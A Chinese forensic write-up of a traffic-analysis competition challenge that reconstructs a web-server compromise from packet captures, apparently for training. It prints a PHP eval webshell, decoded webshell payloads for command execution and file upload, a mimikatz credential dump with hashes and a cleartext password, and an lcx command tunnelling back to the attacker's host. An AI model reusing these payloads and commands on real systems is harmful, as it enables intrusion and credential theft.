[信息安全铁人三项赛总决赛](数据赛)第四题

字数 993阅读 1141

WriteUps

信息安全铁人三项赛总决赛总结(企业赛)
信息安全铁人三项赛总决赛(数据赛)第二题
信息安全铁人三项赛总决赛(数据赛)第三题
信息安全铁人三项赛总决赛(数据赛)第四题


所有题目 : https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00004.md


image.png

有人在进行目录扫描
基本上可以确定 , 一个潜在的攻击者 , 以及被攻击者

攻击者 : 172.16.10.110
被攻击者 : 192.168.20.117

首先过滤出这两者之间的所有数据包

PS :
感觉还是在发现攻击者和被攻击者之后直接提取出他们之间的所有数据包比较靠谱

#!/bin/bash
#attack_dump.sh

target_folder='attack'

mkdir ${target_folder}

for file in `ls *.pcap`;
do
   echo "Dumping attack package in ${file}..."
   tcpdump -A -s 0 'host 172.16.10.110 or host 192.168.20.117' -r $file -w ${target_folder}/${file}
   echo "${file} Done!"
done

同时也生成了 http 的数据包
还是感觉直接搜索 http 的文本来的比较快

首先直接 grep 看看有没有小马什么的

888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:<?php @eval($_POST['t'])?>
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}.k@...St..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

不过居然是个文本文件 ?

image.png

再往上下翻翻居然发现了一个小马

image.png

这里的小马好像有一些特征 :
比如说 :

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map

根据这个特性进行搜索

grep -n -C 5 'spider.html' http.txt | grep 'POST '

果然发现了两个小马 :

/9.php
/uploadfile/2017/0905/20170905055411283.php
image.png

猜想这两个小马可能是通过漏洞写入的
直接搜索 9.php 最开始出现的地方

image.png

image.png

搜索一下 /admin/file_manage_control.php
发现是织梦CMS
利用的漏洞应该是 :

http://www.cnblogs.com/LittleHann/p/4237578.html

可以看到首先攻击者利用了上述漏洞 9.php 写入服务器

image.png

而搜索另一个小马的时候却发现是直接就进行了利用
而且文件名是以时间的形式命名
猜想是利用了文件上传漏洞将文件上传到服务器的

根据数据包详情 , 找到了如下一篇文章 :

http://0day5.com/archives/4368/ (phpcms v9 前台 GetShell)
这个漏洞在利用的过程中用到了 1.txt

继续向前回溯

找到攻击者是通过 9.php 写入了 1.txt 这个文件

image.png
image.png

继续向前分析 , 攻击者在触发 DedeCMS 写入 9.php 的时候需要得到管理员的密码
那么在这之前肯定对密码进行了爆破

grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c
image.png

经过寻找发现 , 攻击者几乎是已经知道了登录后台的密码 , 并没有经过爆破 , 而是直接登录


image.png
gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=

用户名为 : admin
密码为 : 19901109

让攻击者直接知道密码就登录
可能性有很多
有可能是攻击者直接通过注入得到了管理员密码
也有可能是通过社工
也可能是敏感信息泄露等等

经过研究发现应该不会是明注得到的管理员密码
因为在流量包中不能检索到别的相同的字符串

image.png

尝试检测是否存在盲注的情况
...可能因为能力有限 , 并没有分析出来...

接下来可以看看攻击者都使用两个小马做了什么
首先看 9.php

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 获取系统版本以及用户名等信息
C:\phpStudy\WWW  C:  Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件
./   2017-09-05 17:34:52 0   0777
../ 2017-08-29 11:16:35 0   0777
a/  2017-09-05 16:05:51 0   0777
admin/  2017-09-05 16:05:51 0   0777
data/   2017-09-05 16:18:01 0   0777
images/ 2017-09-05 16:03:30 0   0777
include/    2017-09-05 16:03:21 0   0777
install/    2017-09-05 16:06:08 0   0777
member/ 2017-09-05 16:03:24 0   0777
phpMyAdmin/ 2017-08-29 11:16:15 0   0777
plus/   2017-09-05 16:05:51 0   0777
special/    2017-09-05 16:05:51 0   0777
templets/   2017-09-05 16:03:26 0   0777
uploads/    2017-09-05 16:05:51 0   0777
9.php   2017-09-05 17:34:52 26  0666
favicon.ico 2010-03-11 15:45:00 1150    0666
index.php   2010-02-07 17:05:00 738 0666
robots.txt  2010-02-07 17:05:00 505 0666
tags.php    2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938    0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 获取系统版本以及用户名等信息

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 whoami
wangguan-c938a1\administrator

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 ipconfig
Windows IP Configuration.               
.                    
.                    
Ethernet adapter ........:.             
.                    
   Connection-specific DNS Suffix  . : .           
   IP Address. . . . . . . . . . . . : 192.168.20.117.
   Subnet Mask . . . . . . . . . . . : 255.255.255.0.
   Default Gateway . . . . . . . . . : 192.168.20.1.

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 systeminfo
......:           WANGGUAN-C938A1
OS ....:          Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS ....:          5.2.3790 Service Pack 2 Build 3790
OS ......:        Microsoft Corporation
OS ....:          ..........
OS ........:      Uniprocessor Free
............:     wangguan
..........:               
.... ID:          91353-645-7659413-50864
............:     2017-8-29, 10:14:19
............:     0 .. 2 .... 55 .. 11 ..
..........:       VMware, Inc.
........:         VMware Virtual Platform
........:         x64-based PC
......:           ...... 1 ..........
                  [01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS ....:        UNKNOWN 
Windows ....:     C:\WINDOWS
........:         C:\WINDOWS\system32
........:         \Device\HarddiskVolume1
............:     zh-cn;....(....)
..............:   zh-cn;....(....)
....:             (GMT+08:00) ....................................
............:     1,023 MB
..............:   379 MB  
........: ......: 2,299 MB
........: ....:   1,854 MB
........: ......: 445 MB  
............:     C:\pagefile.sys
..:               WORKGROUP
..........:       \\WANGGUAN-C938A1
........:         ...... 1 ............
                  [       
17:35:41.557144 IP 192.168.20.117.http > 172.16.10.110.5299: Flags [P.], seq 2606:2963, ack 4254, win 64240, length 357: HTTP
E...TG@........u..        
n.P......5..QP...."..01]: Q147222
....:             ...... 1 .. NIC..
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      ......:      ........
                      .... DHCP:   ..                                                                                          
                      DHCP ......: 192.168.20.1
                      IP ....
                      [01]: 192.168.20.117
[S]                       

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传本地文件保存到 C:\\phpStudy\\WWW\\mimikatz.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt
// 使用 mimikatz.exe 搜集系统密码并输出到 C:\\phpStudy\\WWW\\log.txt 中

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 读取文件内容 : C:\\phpStudy\\WWW\\log.txt
  .#####.   mimikatz 2.1.1 (x64) built on Apr  9 2017 23:24:20
 .## ^ ##.  "A La Vie, A L'Amour"                   
 ## / \ ##  /* * *                                  
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */
                                                    
mimikatz(commandline) # privilege::debug            
Privilege '20' OK                                   
                                                    
mimikatz(commandline) # sekurlsa::logonpasswords    
                                                    
Authentication Id : 0 ; 996 (00000000:000003e4)     
Session           : Service from 0                  
User Name         : NETWORK SERVICE                 
Domain            : NT AUTHORITY                    
Logon Server      : (null)                          
Logon Time        : 2017-9-5 14:40:42               
SID               : S-1-5-20                        
    msv :                                           
     [00000002] Primary                             
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * LM       : aad3b435b51404eeaad3b435b51404ee  
     * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0       
     * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
    wdigest :                                       
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    kerberos :                                      
     * Username : wangguan-c938a1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    ssp :                                           
    credman :                                       
                                                    
Authentication Id : 0 ; 216713 (00000000:00034e89)  
Session           : Interactive from 0              
Us                                                                                                                         
17:36:47.042287 IP 192.168.20.117.http > 172.16.10.110.5303: Flags [.], seq 1461:2921, ack 767, win 63473, length 1460: HTTP
E...V.@........u..                                  
n.P...#U....8P....n..er Name         : Administrator                                                                          
Domain            : WANGGUAN-C938A1                 
Logon Server      : WANGGUAN-C938A1                 
Logon Time        : 2017-9-5 14:41:24               
SID               : S-1-5-21-2640452580-1396535521-4086226850-500
    msv :                                           
     [00000002] Primary                             
     * Username : Administrator                     
     * Domain   : WANGGUAN-C938A1
     * LM       : 1160eb40860de5aeb75e0c8d76954a50
     * NTLM     : 74e0fa3bf5a67fd3b43ed8912042fabb       
     * SHA1     : 9d464a83db1089ff0b49c72938d2806953594714
    wdigest :      
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    kerberos :     
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    ssp :       
    credman :   
                
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null) 
Logon Time        : 2017-9-5 14:40:42
SID               : S-1-5-19
    msv :       
    wdigest :   
    kerberos :     
     * Username : (null)  
     * Domain   : (null)  
     * Password : (null)  
    ssp :       
    credman :   
                
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)          
Logon Time        : 2017-9-5 14:40:42
SID               : 
    msv :       
    wdigest :   
    kerberos :  
    ssp :       
    credman :                                                                    
                
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType f


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件内容 : C:\\phpStudy\\WWW\\log.txt

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传文件保存至 : C:\\phpStudy\\WWW\\DTools.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\data\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\data\\common.inc.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 获取文件内容 : C:\\phpStudy\\WWW\\data\\common.inc.php
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\data\\common.inc.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 获取文件内容 : C:\\phpStudy\\WWW\\data\\common.inc.php
<?php                    
//..............            
$cfg_dbhost = 'localhost';  
$cfg_dbname = 'dedecms';    
$cfg_dbuser = 'root';       
$cfg_dbpwd = 'root';        
$cfg_dbprefix = 'dede_';    
$cfg_db_language = 'gbk';                               
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传文件保存至 : C:\\phpStudy\\WWW\\data\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\data\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传文件保存至 : C:\\Hscan***.zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传文件保存至 : C:\\Hscan***.zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\ 目录下的所有文件
Documents and Settings/  2017-08-30 10:26:49 0   0777
phpStudy/   2017-08-29 11:16:35 0   0777
Program Files/  2017-08-29 10:19:09 0   0555
Program Files (x86)/    2017-08-29 10:10:05 0   0555
RECYCLER/   2017-08-29 11:24:41 0   0777
System Volume Information/  2017-08-29 10:15:42 0   0777
WINDOWS/    2017-09-05 17:50:05 0   0777
wmpub/  2017-08-29 10:11:11 0   0777
AUTOEXEC.BAT    2017-08-29 10:10:54 0   0777
boot.ini    2017-08-29 10:06:43 221 0666
bootfont.bin    2007-03-07 20:00:00 322730  0444
CONFIG.SYS  2017-08-29 10:10:54 0   0666
Hscan...........zip 2017-09-05 17:41:19 1170778 0666
IO.SYS  2017-08-29 10:10:54 0   0444
lcx.exe 2017-09-05 17:49:48 8704    0777
MSDOS.SYS   2017-08-29 10:10:54 0   0444
NTDETECT.COM    2007-03-07 20:00:00 47772   0555
ntldr   2007-03-07 20:00:00 306288  0444 
pagefile.sys    2017-09-05 14:40:40 1610612736  0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// 写入文件 C:\\phpStudy\\WWW\\1.txt
<?php @eval($_POST['t'])?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

